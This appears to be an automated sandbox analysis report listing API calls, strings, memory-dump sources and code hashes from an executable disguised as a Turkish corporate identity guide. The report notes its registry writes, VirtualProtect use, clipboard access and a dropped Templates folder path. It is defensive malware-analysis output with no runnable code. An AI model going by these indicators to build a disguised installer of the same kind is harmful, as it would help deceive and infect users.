                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePointerwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 327478801-0
                                                                                                                                                                                          • Opcode ID: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                                                                                                                                                          • Instruction ID: 7f9197a1b1888ebfd6de04269447b21ffcaf0972564048b2e7bc6ee4a29003df
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29E06D71E04104AAD710EBA5AE098AEB768DB84318B24407FF201B50D1CA7949119E2D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E76
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(6F3D505C,00000004,00000040,6F3D504C), ref: 6F3D29B1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,004061B5,0042C228,00000000,?,?,Call,?), ref: 0040614B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,6F3D123B,?,6F3D12DF,00000019,6F3D11BE,-000000A0), ref: 6F3D1225
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040550B
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                                                                                                                                                            • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405636
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040565A
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000008), ref: 0040565F
                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 004056A9
                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004056EE
                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00405722
                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405783
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00405789
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004057E4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                          • String ID: {
                                                                                                                                                                                          • API String ID: 590372296-366298937
                                                                                                                                                                                          • Opcode ID: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                                                                          • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                                                                                                                                                                          • Opcode Fuzzy Hash: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404889
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404895
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                                                                                                                                                            • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917
                                                                                                                                                                                            • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                            • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                            • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                            • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                                                                                                                                                            • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                            • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                            • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                          • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$Call
                                                                                                                                                                                          • API String ID: 2624150263-2694976400
                                                                                                                                                                                          • Opcode ID: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                                                                          • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                                                                          • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146, xrefs: 004021C3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146
                                                                                                                                                                                          • API String ID: 542301482-3016365613
                                                                                                                                                                                          • Opcode ID: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                                                                                                                                                          • Instruction ID: 47658dbbd12ee8008517b47355d5d9d52026a5fb35fba2bce99957a22e6c3eef
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B414C71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB44
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: p!C$p!C
                                                                                                                                                                                          • API String ID: 0-3125587631
                                                                                                                                                                                          • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                                                          • Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
                                                                                                                                                                                          • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                          • Opcode ID: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                                                                                                                                                          • Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                          • Instruction ID: 703def0becceeecb9d8561ea32c53bcab4b84ebc773a8a1d0b412cad538f794c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EE1797190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004044D0
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004044F1
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 00404573
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004045F2
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040460E
                                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                          • String ID: Call$N$gC@
                                                                                                                                                                                          • API String ID: 3103080414-2733886405
                                                                                                                                                                                          • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                                                          • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                                                                                                                                                                          • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                                                          • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                          • DrawTextW.USER32(00000000,Fjernbetjeningsenhedernes Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                          • String ID: F$Fjernbetjeningsenhedernes Setup
                                                                                                                                                                                          • API String ID: 941294808-2989215355
                                                                                                                                                                                          • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                                                          • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                                                                                                                                          • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                                                                                                                                          Uniqueness

